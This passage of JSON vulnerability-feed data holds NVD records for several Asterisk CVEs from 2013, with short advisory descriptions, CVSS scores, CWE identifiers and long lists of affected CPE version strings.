"cpe:2.3:a:digium:asterisk:1.8.10.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert4:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.0:rc1:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.3.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.11:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.13.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.1:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.3.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.5.2:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.16.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.0.0:beta2:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.1.0:*:digiumphones:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.4:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T14:50:36", "description": "Buffer overflow in the unpacksms16 function in apps/app_sms.c in Asterisk Open Source 1.8.x before 1.8.24.1, 10.x before 10.12.4, and 11.x before 11.6.1; Asterisk with Digiumphones 10.x-digiumphones before 10.12.4-digiumphones; and Certified Asterisk 1.8.x before 1.8.15-cert4 and 11.x before 11.2-cert3 allows remote attackers to cause a denial of service (daemon crash) via a 16-bit SMS message with an odd number of bytes, which triggers an infinite loop.", "cvss3": {}, "published": "2013-12-19T22:55:00", "type": "cve", "title": "CVE-2013-7100", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-7100"], "modified": "2017-08-29T01:34:00", "cpe": ["cpe:/a:digium:asterisk:1.8.21.0", "cpe:/a:digium:asterisk_digiumphones:10.0.0", "cpe:/a:digium:asterisk_digiumphones:10.12.2", "cpe:/a:digium:certified_asterisk:1.8.15", "cpe:/a:digium:asterisk:11.2.0", "cpe:/a:digium:asterisk:10.12.1", "cpe:/a:digium:asterisk:11.5.0", "cpe:/a:digium:asterisk:1.8.18.1", "cpe:/a:digium:asterisk:1.8.19.0", "cpe:/a:digium:asterisk_digiumphones:10.11.0", "cpe:/a:digium:asterisk:11.1.0", "cpe:/a:digium:asterisk_digiumphones:10.12.1", "cpe:/a:digium:asterisk:1.8.20.0", "cpe:/a:digium:asterisk:1.8.22.0", "cpe:/a:digium:asterisk:1.8.23.0", "cpe:/a:digium:asterisk:11.5.1", "cpe:/a:digium:asterisk:10.11.0", "cpe:/a:digium:asterisk:11.0.1", "cpe:/a:digium:certified_asterisk:11.2.0", "cpe:/a:digium:asterisk:11.1.1", "cpe:/a:digium:asterisk:11.0.0", "cpe:/a:digium:asterisk:10.12.2", "cpe:/a:digium:asterisk_digiumphones:10.12.0", "cpe:/a:digium:asterisk:11.4.0", "cpe:/a:digium:asterisk:10.12.0", "cpe:/a:digium:asterisk:11.0.2", "cpe:/a:digium:asterisk:1.8.17.0", "cpe:/a:digium:asterisk:1.8.18.0", "cpe:/a:digium:asterisk:11.1.2", "cpe:/a:digium:asterisk:1.8.19.1", "cpe:/a:digium:asterisk:10.10.0", "cpe:/a:digium:asterisk:11.3.0"], "id": "CVE-2013-7100", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-7100", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}, "cpe23": ["cpe:2.3:a:digium:asterisk:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.10.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.21.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.18.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.23.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.5.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.22.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.19.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.2:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert1-rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.3.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:1.8.15:cert2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:1.8.20.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:11.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:digium:certified_asterisk:11.2.0:cert1:*:*:*:*:*:*", "cpe:2.3:a:digium:asterisk_digiumphones:10.11.0:rc2:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:38:02", "description": "Stack-based buffer overflow in res/res_format_attr_h264.c in Asterisk Open Source 11.x before 11.2.2 allows remote attackers to execute arbitrary code via a long sprop-parameter-sets H.264 media attribute in a SIP Session Description Protocol (SDP) header.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "cve", "title": "CVE-2013-2685", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2685"], "modified": "2013-04-02T04:00:00", "cpe": ["cpe:/a:asterisk:open_source:11.0.2", "cpe:/a:asterisk:open_source:11.2.0", "cpe:/a:asterisk:open_source:11.0.1", "cpe:/a:asterisk:open_source:11.1.1", "cpe:/a:asterisk:open_source:11.2.1", "cpe:/a:asterisk:open_source:11.1.0", "cpe:/a:asterisk:open_source:11.1.2", "cpe:/a:asterisk:open_source:11.0.0"], "id": "CVE-2013-2685", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2685", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:a:asterisk:open_source:11.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T12:29:58", "description": "The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, 10.x before 10.12.2, and 11.x before 11.2.2; Certified Asterisk 1.8.15 before 1.8.15-cert2; Asterisk Business Edition (BE) C.3.x before C.3.8.1; and Asterisk Digiumphones 10.x-digiumphones before 10.12.2-digiumphones exhibits different behavior for invalid INVITE, SUBSCRIBE, and REGISTER transactions depending on whether the user account exists, which allows remote attackers to enumerate account names by (1) reading HTTP status codes, (2) reading additional text in a 403 (aka Forbidden) response, or (3) observing whether certain retransmissions occur.", "cvss3": {}, "published": "2013-04-01T16:55:00", "type": "cve", "title": "CVE-2013-2264", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2264"], "modified": "2013-04-01T16:55:00", "cpe": ["cpe:/a:asterisk:open_source:11.0.2", "cpe:/a:asterisk:digiumphones:10.6.0", "cpe:/a:asterisk:open_source:1.8.7.2", "cpe:/a:asterisk:open_source:1.8.9.2", "cpe:/a:asterisk:open_source:1.8.3.2", "cpe:/a:asterisk:open_source:10.1.0", "cpe:/a:asterisk:open_source:1.8.18.0", "cpe:/a:asterisk:open_source:11.2.0", "cpe:/a:asterisk:digiumphones:10.12.1", "cpe:/a:asterisk:open_source:1.8.14.1", "cpe:/a:asterisk:open_source:10.1.1", "cpe:/a:asterisk:open_source:1.8.16.0", "cpe:/a:asterisk:open_source:1.8.10.0", "cpe:/a:asterisk:open_source:1.8.4.1", "cpe:/a:asterisk:digiumphones:10.11.0", "cpe:/a:asterisk:open_source:10.0.0", "cpe:/a:asterisk:open_source:1.8.1", "cpe:/a:asterisk:digiumphones:10.0.0", "cpe:/a:asterisk:digiumphones:10.3.0", "cpe:/a:asterisk:digiumphones:10.2.0", "cpe:/a:asterisk:open_source:1.8.4.2", "cpe:/a:asterisk:open_source:1.8.7.0", "cpe:/a:asterisk:digiumphones:10.9.0", "cpe:/a:asterisk:open_source:11.0.0", "cpe:/a:asterisk:open_source:10.2.0", "cpe:/a:asterisk:open_source:10.5.0", "cpe:/a:asterisk:open_source:11.2.1", "cpe:/a:asterisk:open_source:10.4.1", "cpe:/a:asterisk:open_source:1.8.4.4", "cpe:/a:asterisk:open_source:1.8.4", "cpe:/a:asterisk:open_source:1.8.2", "cpe:/a:asterisk:open_source:11.1.1", "cpe:/a:asterisk:open_source:1.8.3.1", "cpe:/a:asterisk:business_edition:c.3.3.2", "cpe:/a:asterisk:open_source:10.1.2", "cpe:/a:asterisk:open_source:1.8.8.0", "cpe:/a:asterisk:open_source:1.8.3", "cpe:/a:asterisk:open_source:1.8.12", "cpe:/a:asterisk:open_source:11.1.0", "cpe:/a:asterisk:open_source:1.8.5", "cpe:/a:asterisk:open_source:1.8.7.1", "cpe:/a:asterisk:open_source:1.8.19.1", "cpe:/a:asterisk:open_source:1.8.11.0", "cpe:/a:asterisk:open_source:10.10.1", "cpe:/a:asterisk:open_source:1.8.3.3", "cpe:/a:asterisk:open_source:1.8.2.4", "cpe:/a:asterisk:business_edition:c.3.3", "cpe:/a:asterisk:open_source:1.8.15.0", "cpe:/a:asterisk:digiumphones:10.10.0", "cpe:/a:asterisk:open_source:1.8.20.1", "cpe:/a:asterisk:open_source:10.3.1", "cpe:/a:asterisk:open_source:1.8.1.1", "cpe:/a:asterisk:open_source:10.9.0", "cpe:/a:asterisk:business_edition:c.3.2.2", "cpe:/a:asterisk:open_source:1.8.2.3", "cpe:/a:asterisk:open_source:10.7.1", "cpe:/a:asterisk:open_source:1.8.8.1", "cpe:/a:asterisk:open_source:10.6.0", "cpe:/a:asterisk:open_source:1.8.9.1", "cpe:/a:asterisk:digiumphones:10.1.0", "cpe:/a:asterisk:open_source:10.5.1", "cpe:/a:asterisk:open_source:10.8.0", "cpe:/a:asterisk:open_source:1.8.11.1", "cpe:/a:asterisk:open_source:10.11.0", "cpe:/a:asterisk:open_source:10.12.1", "cpe:/a:asterisk:open_source:1.8.4.3", "cpe:/a:asterisk:open_source:1.8.12.2", "cpe:/a:asterisk:open_source:1.8.1.2", "cpe:/a:asterisk:open_source:1.8.10.1", "cpe:/a:asterisk:open_source:1.8.12.1", "cpe:/a:asterisk:open_source:1.8.8.2", "cpe:/a:asterisk:open_source:1.8.12.0", "cpe:/a:asterisk:open_source:1.8.18.1", "cpe:/a:asterisk:open_source:1.8.5.0", "cpe:/a:asterisk:open_source:10.2.1", "cpe:/a:asterisk:open_source:1.8.15.1", "cpe:/a:asterisk:open_source:1.8.14.0", "cpe:/a:asterisk:open_source:10.10.0", "cpe:/a:asterisk:digiumphones:10.4.0", "cpe:/a:asterisk:certified_asterisk:1.8.15.0", "cpe:/a:asterisk:open_source:10.1.3", "cpe:/a:asterisk:open_source:1.8.13.0", "cpe:/a:asterisk:digiumphones:10.12.0", "cpe:/a:asterisk:open_source:10.4.2", "cpe:/a:asterisk:open_source:10.5.2", "cpe:/a:asterisk:open_source:1.8.13.1", "cpe:/a:asterisk:open_source:1.8.6.0", "cpe:/a:asterisk:digiumphones:10.8.0", "cpe:/a:asterisk:open_source:11.1.2", "cpe:/a:asterisk:digiumphones:10.7.0", "cpe:/a:asterisk:open_source:10.6.1", "cpe:/a:asterisk:open_source:1.8.9.3", "cpe:/a:asterisk:open_source:1.8.0", "cpe:/a:asterisk:certified_asterisk:1.8.15", "cpe:/a:asterisk:open_source:10.12.0", "cpe:/a:asterisk:open_source:1.8.17.0", "cpe:/a:asterisk:open_source:1.8.20.0", "cpe:/a:asterisk:open_source:1.8.2.2", "cpe:/a:asterisk:open_source:1.8.19.0", "cpe:/a:asterisk:open_source:1.8.2.1", "cpe:/a:asterisk:open_source:1.8.9.0", "cpe:/a:asterisk:open_source:10.4.0", "cpe:/a:asterisk:open_source:10.3.0", "cpe:/a:asterisk:open_source:11.0.1", "cpe:/a:asterisk:digiumphones:10.5.0", "cpe:/a:asterisk:open_source:10.0.1", "cpe:/a:asterisk:open_source:10.7.0", "cpe:/a:asterisk:open_source:10.11.1"], "id": "CVE-2013-2264", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-2264", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:asterisk:open_source:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.3:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.0.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.10.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.8.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.4.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15:cert1:rc3:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:rc4:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.8.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:certified_asterisk:1.8.15.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.3:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.7.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.2.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.10.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.0.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.19.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.12.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:11.0.0:beta2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.9.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.16.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.9.0:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.10.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.11.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.4:rc3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:business_edition:c.3.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.0:beta3:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.6.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.20.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.2.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.1.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.11.1:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:10.4.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.15.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.5.0:*:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.17.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.8.0:rc2:*:*:*:*:*:*", "cpe:2.3:a:asterisk:digiumphones:10.5.0:rc1:*:*:*:*:*:*", "cpe:2.3:a:asterisk:open_source:1.8.13.0:rc2:*:*:*:*:*:*", 